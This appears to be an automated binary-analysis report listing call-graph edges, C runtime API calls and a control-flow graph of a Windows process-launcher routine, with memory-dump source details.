20850->20854 20850->20869 20858 7ff78c9d1f65 20852->20858 20853 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20853->20836 20854->20847 20854->20869 21005 7ff78c9d81fc 20854->21005 20859 7ff78c9d1f35 20855->20859 20862 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20857->20862 20863 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20858->20863 20864 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20859->20864 20860 7ff78c9d1ef7 20860->20854 20868 7ff78c9d227c 45 API calls 20860->20868 20861 7ff78c9d1ed9 20865 7ff78c9c5de8 _set_fmode 11 API calls 20861->20865 20867 7ff78c9d1ff4 20862->20867 20863->20854 20864->20850 20865->20869 20866->20869 20870 7ff78c9d45ec 40 API calls 20866->20870 20873 7ff78c9d45ec 40 API calls 20867->20873 20879 7ff78c9d1ffa 20867->20879 20868->20854 20869->20853 20871 7ff78c9d207c 20870->20871 20872 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20871->20872 20874 7ff78c9d2086 20872->20874 20876 7ff78c9d2026 20873->20876 20874->20869 20874->20879 20875 7ff78c9d213f 20877 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20875->20877 20878 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20876->20878 20877->20836 20878->20879 20879->20875 20880 7ff78c9cfda4 _set_fmode 11 API calls 20879->20880 20881 7ff78c9d20cb 20880->20881 20882 7ff78c9d20d3 20881->20882 20883 7ff78c9d20dc 20881->20883 20884 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20882->20884 20885 7ff78c9d1684 37 API calls 20883->20885 20886 7ff78c9d20da 20884->20886 20887 7ff78c9d20ea 20885->20887 20893 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20886->20893 20888 7ff78c9d217f 20887->20888 20889 7ff78c9d20f2 SetEnvironmentVariableW 20887->20889 20892 7ff78c9cb7e4 _isindst 17 API calls 20888->20892 20890 7ff78c9d2116 20889->20890 20891 7ff78c9d2137 20889->20891 20894 7ff78c9c5de8 _set_fmode 11 API calls 20890->20894 20896 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20891->20896 20895 7ff78c9d2193 20892->20895 20893->20836 20897 7ff78c9d211b 20894->20897 20896->20875 20898 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20897->20898 20898->20886 20900 7ff78c9d21c9 20899->20900 20907 7ff78c9d21b1 20899->20907 20901 7ff78c9cfda4 _set_fmode 11 API calls 20900->20901 20910 7ff78c9d21ed 20901->20910 20902 7ff78c9d2272 20904 7ff78c9cb3ac __GetCurrentState 45 API calls 20902->20904 20903 7ff78c9d224e 20905 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20903->20905 20906 7ff78c9d2278 20904->20906 20905->20907 20907->20775 20908 7ff78c9cfda4 _set_fmode 11 API calls 20908->20910 20909 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20909->20910 20910->20902 20910->20903 20910->20908 20910->20909 20911 7ff78c9cb34c __std_exception_copy 37 API calls 20910->20911 20912 7ff78c9d225d 20910->20912 20911->20910 20913 7ff78c9cb7e4 _isindst 17 API calls 20912->20913 20913->20902 20915 7ff78c9ca5ac 20914->20915 20919 7ff78c9ca5b5 20914->20919 20915->20919 21029 7ff78c9ca074 20915->21029 20919->20792 20919->20793 20921 7ff78c9d7464 20920->20921 20922 7ff78c9d8349 20920->20922 20923 7ff78c9d7471 20921->20923 20928 7ff78c9d74a7 20921->20928 20924 7ff78c9c5e2c 45 API calls 20922->20924 20926 7ff78c9c5de8 _set_fmode 11 API calls 20923->20926 20930 7ff78c9d7418 20923->20930 20925 7ff78c9d837d 20924->20925 20933 7ff78c9d8393 20925->20933 20936 7ff78c9d83aa 20925->20936 20951 7ff78c9d8382 20925->20951 20929 7ff78c9d747b 20926->20929 20927 7ff78c9d74d1 20931 7ff78c9c5de8 _set_fmode 11 API calls 20927->20931 20928->20927 20932 7ff78c9d74f6 20928->20932 20934 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 20929->20934 20930->20786 20935 7ff78c9d74d6 20931->20935 20940 7ff78c9c5e2c 45 API calls 20932->20940 20946 7ff78c9d74e1 20932->20946 20937 7ff78c9c5de8 _set_fmode 11 API calls 20933->20937 20938 7ff78c9d7486 20934->20938 20939 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 20935->20939 20942 7ff78c9d83b4 20936->20942 20943 7ff78c9d83c6 20936->20943 20941 7ff78c9d8398 20937->20941 20938->20786 20939->20946 20940->20946 20947 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 20941->20947 20948 7ff78c9c5de8 _set_fmode 11 API calls 20942->20948 20944 7ff78c9d83ee 20943->20944 20945 7ff78c9d83d7 20943->20945 21255 7ff78c9da15c 20944->21255 21246 7ff78c9d74b4 20945->21246 20946->20786 20947->20951 20952 7ff78c9d83b9 20948->20952 20951->20786 20954 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 20952->20954 20954->20951 20955 7ff78c9c5de8 _set_fmode 11 API calls 20955->20951 20957 7ff78c9d462b 20956->20957 20958 7ff78c9d460e 20956->20958 20960 7ff78c9d4635 20957->20960 21295 7ff78c9d8e48 20957->21295 20958->20957 20959 7ff78c9d461c 20958->20959 20961 7ff78c9c5de8 _set_fmode 11 API calls 20959->20961 21302 7ff78c9d8e84 20960->21302 20964 7ff78c9d4621 memcpy_s 20961->20964 20964->20811 20966 7ff78c9c5e2c 45 API calls 20965->20966 20967 7ff78c9d84ba 20966->20967 20968 7ff78c9d84c8 20967->20968 21314 7ff78c9d0130 20967->21314 21317 7ff78c9c6408 20968->21317 20972 7ff78c9d85b4 20975 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20972->20975 20977 7ff78c9d85c5 20972->20977 20973 7ff78c9c5e2c 45 API calls 20974 7ff78c9d8537 20973->20974 20978 7ff78c9d0130 5 API calls 20974->20978 20980 7ff78c9d8540 20974->20980 20975->20977 20976 7ff78c9d1db3 20976->20829 20976->20830 20977->20976 20979 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20977->20979 20978->20980 20979->20976 20981 7ff78c9c6408 14 API calls 20980->20981 20982 7ff78c9d859b 20981->20982 20982->20972 20983 7ff78c9d85a3 SetEnvironmentVariableW 20982->20983 20983->20972 20985 7ff78c9d22bc 20984->20985 20992 7ff78c9d229f 20984->20992 20986 7ff78c9cfda4 _set_fmode 11 API calls 20985->20986 20994 7ff78c9d22e0 20986->20994 20987 7ff78c9d2364 20989 7ff78c9cb3ac __GetCurrentState 45 API calls 20987->20989 20988 7ff78c9d2341 20990 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20988->20990 20991 7ff78c9d236a 20989->20991 20990->20992 20992->20842 20993 7ff78c9cfda4 _set_fmode 11 API calls 20993->20994 20994->20987 20994->20988 20994->20993 20995 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20994->20995 20996 7ff78c9d1684 37 API calls 20994->20996 20997 7ff78c9d2350 20994->20997 20995->20994 20996->20994 20998 7ff78c9cb7e4 _isindst 17 API calls 20997->20998 20998->20987 21000 7ff78c9ca5f1 20999->21000 21001 7ff78c9ca5e8 20999->21001 21000->20860 21000->20861 21001->21000 21002 7ff78c9ca0e8 40 API calls 21001->21002 21003 7ff78c9ca5fa 21002->21003 21003->21000 21004 7ff78c9ca4a8 12 API calls 21003->21004 21004->21000 21006 7ff78c9d8209 21005->21006 21009 7ff78c9d8236 21005->21009 21007 7ff78c9d820e 21006->21007 21006->21009 21008 7ff78c9c5de8 _set_fmode 11 API calls 21007->21008 21011 7ff78c9d8213 21008->21011 21010 7ff78c9d827a 21009->21010 21013 7ff78c9d8299 21009->21013 21027 7ff78c9d826e __crtLCMapStringW 21009->21027 21012 7ff78c9c5de8 _set_fmode 11 API calls 21010->21012 21014 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 21011->21014 21015 7ff78c9d827f 21012->21015 21016 7ff78c9d82a3 21013->21016 21017 7ff78c9d82b5 21013->21017 21018 7ff78c9d821e 21014->21018 21019 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 21015->21019 21020 7ff78c9c5de8 _set_fmode 11 API calls 21016->21020 21021 7ff78c9c5e2c 45 API calls 21017->21021 21018->20854 21019->21027 21022 7ff78c9d82a8 21020->21022 21023 7ff78c9d82c2 21021->21023 21024 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 21022->21024 21023->21027 21339 7ff78c9d9d18 21023->21339 21024->21027 21027->20854 21028 7ff78c9c5de8 _set_fmode 11 API calls 21028->21027 21030 7ff78c9ca08d 21029->21030 21031 7ff78c9ca089 21029->21031 21052 7ff78c9d3800 21030->21052 21031->20919 21044 7ff78c9ca3c8 21031->21044 21036 7ff78c9ca09f 21038 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21036->21038 21037 7ff78c9ca0ab 21078 7ff78c9ca158 21037->21078 21038->21031 21041 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21042 7ff78c9ca0d2 21041->21042 21043 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21042->21043 21043->21031 21045 7ff78c9ca3f1 21044->21045 21050 7ff78c9ca40a 21044->21050 21045->20919 21046 7ff78c9d19f8 WideCharToMultiByte 21046->21050 21047 7ff78c9cfda4 _set_fmode 11 API calls 21047->21050 21048 7ff78c9ca49a 21049 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21048->21049 21049->21045 21050->21045 21050->21046 21050->21047 21050->21048 21051 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21050->21051 21051->21050 21053 7ff78c9d380d 21052->21053 21054 7ff78c9ca092 21052->21054 21097 7ff78c9cc0c4 21053->21097 21058 7ff78c9d3b3c GetEnvironmentStringsW 21054->21058 21059 7ff78c9ca097 21058->21059 21061 7ff78c9d3b6c 21058->21061 21059->21036 21059->21037 21060 7ff78c9d19f8 WideCharToMultiByte 21062 7ff78c9d3bbd 21060->21062 21061->21060 21063 7ff78c9d3bc4 FreeEnvironmentStringsW 21062->21063 21064 7ff78c9ce664 _fread_nolock 12 API calls 21062->21064 21063->21059 21065 7ff78c9d3bd7 21064->21065 21066 7ff78c9d3bdf 21065->21066 21067 7ff78c9d3be8 21065->21067 21068 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21066->21068 21069 7ff78c9d19f8 WideCharToMultiByte 21067->21069 21070 7ff78c9d3be6 21068->21070 21071 7ff78c9d3c0b 21069->21071 21070->21063 21072 7ff78c9d3c0f 21071->21072 21073 7ff78c9d3c19 21071->21073 21074 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21072->21074 21075 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21073->21075 21076 7ff78c9d3c17 FreeEnvironmentStringsW 21074->21076 21075->21076 21076->21059 21079 7ff78c9ca17d 21078->21079 21080 7ff78c9cfda4 _set_fmode 11 API calls 21079->21080 21093 7ff78c9ca1b3 21080->21093 21081 7ff78c9ca1bb 21082 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21081->21082 21083 7ff78c9ca0b3 21082->21083 21083->21041 21084 7ff78c9ca22e 21085 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21084->21085 21085->21083 21086 7ff78c9cfda4 _set_fmode 11 API calls 21086->21093 21087 7ff78c9ca21d 21088 7ff78c9ca384 11 API calls 21087->21088 21090 7ff78c9ca225 21088->21090 21089 7ff78c9cb34c __std_exception_copy 37 API calls 21089->21093 21091 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21090->21091 21091->21081 21092 7ff78c9ca253 21095 7ff78c9cb7e4 _isindst 17 API calls 21092->21095 21093->21081 21093->21084 21093->21086 21093->21087 21093->21089 21093->21092 21094 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21093->21094 21094->21093 21096 7ff78c9ca266 21095->21096 21098 7ff78c9cc0d5 FlsGetValue 21097->21098 21099 7ff78c9cc0f0 FlsSetValue 21097->21099 21100 7ff78c9cc0e2 21098->21100 21101 7ff78c9cc0ea 21098->21101 21099->21100 21102 7ff78c9cc0fd 21099->21102 21103 7ff78c9cc0e8 21100->21103 21104 7ff78c9cb3ac __GetCurrentState 45 API calls 21100->21104 21101->21099 21105 7ff78c9cfda4 _set_fmode 11 API calls 21102->21105 21117 7ff78c9d34d4 21103->21117 21106 7ff78c9cc165 21104->21106 21107 7ff78c9cc10c 21105->21107 21108 7ff78c9cc12a FlsSetValue 21107->21108 21109 7ff78c9cc11a FlsSetValue 21107->21109 21110 7ff78c9cc136 FlsSetValue 21108->21110 21111 7ff78c9cc148 21108->21111 21112 7ff78c9cc123 21109->21112 21110->21112 21114 7ff78c9cbd9c _set_fmode 11 API calls 21111->21114 21113 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21112->21113 21113->21100 21115 7ff78c9cc150 21114->21115 21116 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21115->21116 21116->21103 21140 7ff78c9d3744 21117->21140 21119 7ff78c9d3509 21155 7ff78c9d31d4 21119->21155 21122 7ff78c9ce664 _fread_nolock 12 API calls 21123 7ff78c9d3537 21122->21123 21124 7ff78c9d353f 21123->21124 21126 7ff78c9d354e 21123->21126 21125 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21124->21125 21139 7ff78c9d3526 21125->21139 21126->21126 21162 7ff78c9d387c 21126->21162 21129 7ff78c9d364a 21130 7ff78c9c5de8 _set_fmode 11 API calls 21129->21130 21131 7ff78c9d364f 21130->21131 21133 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21131->21133 21132 7ff78c9d36a5 21138 7ff78c9d370c 21132->21138 21173 7ff78c9d3004 21132->21173 21133->21139 21134 7ff78c9d3664 21134->21132 21137 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21134->21137 21136 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21136->21139 21137->21132 21138->21136 21139->21054 21141 7ff78c9d3767 21140->21141 21144 7ff78c9d3771 21141->21144 21188 7ff78c9d14e8 EnterCriticalSection 21141->21188 21143 7ff78c9d37e3 21143->21119 21144->21143 21147 7ff78c9cb3ac __GetCurrentState 45 API calls 21144->21147 21148 7ff78c9d37fb 21147->21148 21150 7ff78c9d3852 21148->21150 21152 7ff78c9cc0c4 50 API calls 21148->21152 21150->21119 21153 7ff78c9d383c 21152->21153 21154 7ff78c9d34d4 65 API calls 21153->21154 21154->21150 21156 7ff78c9c5e2c 45 API calls 21155->21156 21157 7ff78c9d31e8 21156->21157 21158 7ff78c9d31f4 GetOEMCP 21157->21158 21159 7ff78c9d3206 21157->21159 21160 7ff78c9d321b 21158->21160 21159->21160 21161 7ff78c9d320b GetACP 21159->21161 21160->21122 21160->21139 21161->21160 21163 7ff78c9d31d4 47 API calls 21162->21163 21164 7ff78c9d38a9 21163->21164 21165 7ff78c9d39ff 21164->21165 21167 7ff78c9d38e6 IsValidCodePage 21164->21167 21172 7ff78c9d3900 memcpy_s 21164->21172 21166 7ff78c9bbab0 _log10_special 8 API calls 21165->21166 21168 7ff78c9d3641 21166->21168 21167->21165 21169 7ff78c9d38f7 21167->21169 21168->21129 21168->21134 21170 7ff78c9d3926 GetCPInfo 21169->21170 21169->21172 21170->21165 21170->21172 21189 7ff78c9d32ec 21172->21189 21245 7ff78c9d14e8 EnterCriticalSection 21173->21245 21190 7ff78c9d3329 GetCPInfo 21189->21190 21199 7ff78c9d341f 21189->21199 21196 7ff78c9d333c 21190->21196 21190->21199 21191 7ff78c9bbab0 _log10_special 8 API calls 21193 7ff78c9d34be 21191->21193 21192 7ff78c9d4050 48 API calls 21194 7ff78c9d33b3 21192->21194 21193->21165 21200 7ff78c9d8d94 21194->21200 21196->21192 21198 7ff78c9d8d94 54 API calls 21198->21199 21199->21191 21201 7ff78c9c5e2c 45 API calls 21200->21201 21202 7ff78c9d8db9 21201->21202 21205 7ff78c9d8a60 21202->21205 21206 7ff78c9d8aa1 21205->21206 21207 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21206->21207 21211 7ff78c9d8aeb 21207->21211 21208 7ff78c9d8d69 21210 7ff78c9bbab0 _log10_special 8 API calls 21208->21210 21209 7ff78c9d8c21 21209->21208 21214 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21209->21214 21212 7ff78c9d33e6 21210->21212 21211->21208 21211->21209 21213 7ff78c9ce664 _fread_nolock 12 API calls 21211->21213 21215 7ff78c9d8b23 21211->21215 21212->21198 21213->21215 21214->21208 21215->21209 21216 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21215->21216 21217 7ff78c9d8b96 21216->21217 21217->21209 21236 7ff78c9d02f0 21217->21236 21220 7ff78c9d8c32 21222 7ff78c9ce664 _fread_nolock 12 API calls 21220->21222 21224 7ff78c9d8d04 21220->21224 21225 7ff78c9d8c50 21220->21225 21221 7ff78c9d8be1 21221->21209 21223 7ff78c9d02f0 __crtLCMapStringW 6 API calls 21221->21223 21222->21225 21223->21209 21224->21209 21226 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21224->21226 21225->21209 21227 7ff78c9d02f0 __crtLCMapStringW 6 API calls 21225->21227 21226->21209 21228 7ff78c9d8cd0 21227->21228 21228->21224 21229 7ff78c9d8d06 21228->21229 21230 7ff78c9d8cf0 21228->21230 21231 7ff78c9d19f8 WideCharToMultiByte 21229->21231 21232 7ff78c9d19f8 WideCharToMultiByte 21230->21232 21233 7ff78c9d8cfe 21231->21233 21232->21233 21233->21224 21234 7ff78c9d8d1e 21233->21234 21234->21209 21235 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21234->21235 21235->21209 21237 7ff78c9cff1c __crtLCMapStringW 5 API calls 21236->21237 21238 7ff78c9d032e 21237->21238 21239 7ff78c9d0336 21238->21239 21242 7ff78c9d03dc 21238->21242 21239->21209 21239->21220 21239->21221 21241 7ff78c9d039f LCMapStringW 21241->21239 21243 7ff78c9cff1c __crtLCMapStringW 5 API calls 21242->21243 21244 7ff78c9d040a __crtLCMapStringW 21243->21244 21244->21241 21247 7ff78c9d74d1 21246->21247 21248 7ff78c9d74e8 21246->21248 21249 7ff78c9c5de8 _set_fmode 11 API calls 21247->21249 21248->21247 21250 7ff78c9d74f6 21248->21250 21251 7ff78c9d74d6 21249->21251 21253 7ff78c9c5e2c 45 API calls 21250->21253 21254 7ff78c9d74e1 21250->21254 21252 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 21251->21252 21252->21254 21253->21254 21254->20951 21256 7ff78c9c5e2c 45 API calls 21255->21256 21257 7ff78c9da181 21256->21257 21260 7ff78c9d9dd8 21257->21260 21262 7ff78c9d9e26 21260->21262 21261 7ff78c9bbab0 _log10_special 8 API calls 21263 7ff78c9d8415 21261->21263 21264 7ff78c9d9ead 21262->21264 21266 7ff78c9d9e98 GetCPInfo 21262->21266 21269 7ff78c9d9eb1 21262->21269 21263->20951 21263->20955 21265 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21264->21265 21264->21269 21267 7ff78c9d9f45 21265->21267 21266->21264 21266->21269 21268 7ff78c9ce664 _fread_nolock 12 API calls 21267->21268 21267->21269 21270 7ff78c9d9f7c 21267->21270 21268->21270 21269->21261 21270->21269 21271 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21270->21271 21272 7ff78c9d9fea 21271->21272 21273 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21272->21273 21282 7ff78c9da0cc 21272->21282 21275 7ff78c9da010 21273->21275 21274 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21274->21269 21276 7ff78c9ce664 _fread_nolock 12 API calls 21275->21276 21277 7ff78c9da03d 21275->21277 21275->21282 21276->21277 21278 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21277->21278 21277->21282 21279 7ff78c9da0b4 21278->21279 21280 7ff78c9da0d4 21279->21280 21281 7ff78c9da0ba 21279->21281 21289 7ff78c9d0174 21280->21289 21281->21282 21284 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21281->21284 21282->21269 21282->21274 21284->21282 21286 7ff78c9da113 21286->21269 21288 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21286->21288 21287 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21287->21286 21288->21269 21290 7ff78c9cff1c __crtLCMapStringW 5 API calls 21289->21290 21291 7ff78c9d01b2 21290->21291 21292 7ff78c9d03dc __crtLCMapStringW 5 API calls 21291->21292 21293 7ff78c9d01ba 21291->21293 21294 7ff78c9d0223 CompareStringW 21292->21294 21293->21286 21293->21287 21294->21293 21296 7ff78c9d8e51 21295->21296 21297 7ff78c9d8e6a HeapSize 21295->21297 21298 7ff78c9c5de8 _set_fmode 11 API calls 21296->21298 21299 7ff78c9d8e56 21298->21299 21300 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 21299->21300 21301 7ff78c9d8e61 21300->21301 21301->20960 21303 7ff78c9d8ea3 21302->21303 21304 7ff78c9d8e99 21302->21304 21306 7ff78c9d8ea8 21303->21306 21312 7ff78c9d8eaf _set_fmode 21303->21312 21305 7ff78c9ce664 _fread_nolock 12 API calls 21304->21305 21310 7ff78c9d8ea1 21305->21310 21307 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21306->21307 21307->21310 21308 7ff78c9d8eb5 21311 7ff78c9c5de8 _set_fmode 11 API calls 21308->21311 21309 7ff78c9d8ee2 HeapReAlloc 21309->21310 21309->21312 21310->20964 21311->21310 21312->21308 21312->21309 21313 7ff78c9d47a0 _set_fmode 2 API calls 21312->21313 21313->21312 21315 7ff78c9cff1c __crtLCMapStringW 5 API calls 21314->21315 21316 7ff78c9d0150 21315->21316 21316->20968 21318 7ff78c9c6432 21317->21318 21319 7ff78c9c6456 21317->21319 21323 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21318->21323 21324 7ff78c9c6441 21318->21324 21320 7ff78c9c64b0 21319->21320 21321 7ff78c9c645b 21319->21321 21322 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21320->21322 21321->21324 21325 7ff78c9c6470 21321->21325 21328 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21321->21328 21333 7ff78c9c64cc 21322->21333 21323->21324 21324->20972 21324->20973 21326 7ff78c9ce664 _fread_nolock 12 API calls 21325->21326 21326->21324 21327 7ff78c9c64d3 GetLastError 21329 7ff78c9c5d5c _fread_nolock 11 API calls 21327->21329 21328->21325 21331 7ff78c9c64e0 21329->21331 21330 7ff78c9d0ab0 _fread_nolock MultiByteToWideChar 21335 7ff78c9c6552 21330->21335 21336 7ff78c9c5de8 _set_fmode 11 API calls 21331->21336 21332 7ff78c9c6501 21334 7ff78c9ce664 _fread_nolock 12 API calls 21332->21334 21333->21327 21333->21332 21337 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21333->21337 21338 7ff78c9c650e 21333->21338 21334->21338 21335->21324 21335->21327 21336->21324 21337->21332 21338->21324 21338->21330 21341 7ff78c9d9d41 __crtLCMapStringW 21339->21341 21340 7ff78c9d82fe 21340->21027 21340->21028 21341->21340 21342 7ff78c9d0174 6 API calls 21341->21342 21342->21340 21343 7ff78c9dbdf3 21345 7ff78c9dbe03 21343->21345 21347 7ff78c9c6288 LeaveCriticalSection 21345->21347 21699 7ff78c9d2670 21717 7ff78c9d14e8 EnterCriticalSection 21699->21717 21718 7ff78c9cbe70 21719 7ff78c9cbe75 21718->21719 21720 7ff78c9cbe8a 21718->21720 21724 7ff78c9cbe90 21719->21724 21725 7ff78c9cbed2 21724->21725 21726 7ff78c9cbeda 21724->21726 21727 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21725->21727 21728 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21726->21728 21727->21726 21729 7ff78c9cbee7 21728->21729 21730 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21729->21730 21731 7ff78c9cbef4 21730->21731 21732 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21731->21732 21733 7ff78c9cbf01 21732->21733 21734 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21733->21734 21735 7ff78c9cbf0e 21734->21735 21736 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21735->21736 21737 7ff78c9cbf1b 21736->21737 21738 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21737->21738 21739 7ff78c9cbf28 21738->21739 21740 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21739->21740 21741 7ff78c9cbf35 21740->21741 21742 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21741->21742 21743 7ff78c9cbf45 21742->21743 21744 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 21743->21744 21745 7ff78c9cbf55 21744->21745 21750 7ff78c9cbd3c 21745->21750 21764 7ff78c9d14e8 EnterCriticalSection 21750->21764 21766 7ff78c9cac70 21769 7ff78c9cabe8 21766->21769 21776 7ff78c9d14e8 EnterCriticalSection 21769->21776

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 7ff78c9b7e30-7ff78c9b7f76 call 7ff78c9bbdb0 call 7ff78c9b88f0 SetConsoleCtrlHandler GetStartupInfoW call 7ff78c9c6200 call 7ff78c9cb324 call 7ff78c9c95f8 call 7ff78c9c6200 call 7ff78c9cb324 call 7ff78c9c95f8 call 7ff78c9c6200 call 7ff78c9cb324 call 7ff78c9c95f8 GetCommandLineW CreateProcessW 23 7ff78c9b7f78-7ff78c9b7f98 GetLastError call 7ff78c9b2310 0->23 24 7ff78c9b7f9d-7ff78c9b7fd9 RegisterClassW 0->24 31 7ff78c9b8289-7ff78c9b82af call 7ff78c9bbab0 23->31 25 7ff78c9b7fe1-7ff78c9b8035 CreateWindowExW 24->25 26 7ff78c9b7fdb GetLastError 24->26 28 7ff78c9b803f-7ff78c9b8044 ShowWindow 25->28 29 7ff78c9b8037-7ff78c9b803d GetLastError 25->29 26->25 32 7ff78c9b804a-7ff78c9b805a WaitForSingleObject 28->32 29->32 34 7ff78c9b80d8-7ff78c9b80df 32->34 35 7ff78c9b805c 32->35 38 7ff78c9b8122-7ff78c9b8129 34->38 39 7ff78c9b80e1-7ff78c9b80f1 WaitForSingleObject 34->39 37 7ff78c9b8060-7ff78c9b8063 35->37 42 7ff78c9b8065 GetLastError 37->42 43 7ff78c9b806b-7ff78c9b8072 37->43 40 7ff78c9b8210-7ff78c9b8229 GetMessageW 38->40 41 7ff78c9b812f-7ff78c9b8145 QueryPerformanceFrequency QueryPerformanceCounter 38->41 44 7ff78c9b8248-7ff78c9b8252 39->44 45 7ff78c9b80f7-7ff78c9b8107 TerminateProcess 39->45 50 7ff78c9b823f-7ff78c9b8246 40->50 51 7ff78c9b822b-7ff78c9b8239 TranslateMessage DispatchMessageW 40->51 48 7ff78c9b8150-7ff78c9b8188 MsgWaitForMultipleObjects PeekMessageW 41->48 42->43 43->39 49 7ff78c9b8074-7ff78c9b8091 PeekMessageW 43->49 52 7ff78c9b8261-7ff78c9b8285 GetExitCodeProcess CloseHandle * 2 44->52 53 7ff78c9b8254-7ff78c9b825a DestroyWindow 44->53 46 7ff78c9b810f-7ff78c9b811d WaitForSingleObject 45->46 47 7ff78c9b8109 GetLastError 45->47 46->44 47->46 54 7ff78c9b81c3-7ff78c9b81ca 48->54 55 7ff78c9b818a 48->55 56 7ff78c9b80c6-7ff78c9b80d6 WaitForSingleObject 49->56 57 7ff78c9b8093-7ff78c9b80c4 TranslateMessage DispatchMessageW PeekMessageW 49->57 50->40 50->44 51->50 52->31 53->52 54->40 59 7ff78c9b81cc-7ff78c9b81f5 QueryPerformanceCounter 54->59 58 7ff78c9b8190-7ff78c9b81c1 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->34 56->37 57->56 57->57 58->54 58->58 59->48 60 7ff78c9b81fb-7ff78c9b8202 59->60 60->44 61 7ff78c9b8204-7ff78c9b8208 60->61 61->40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
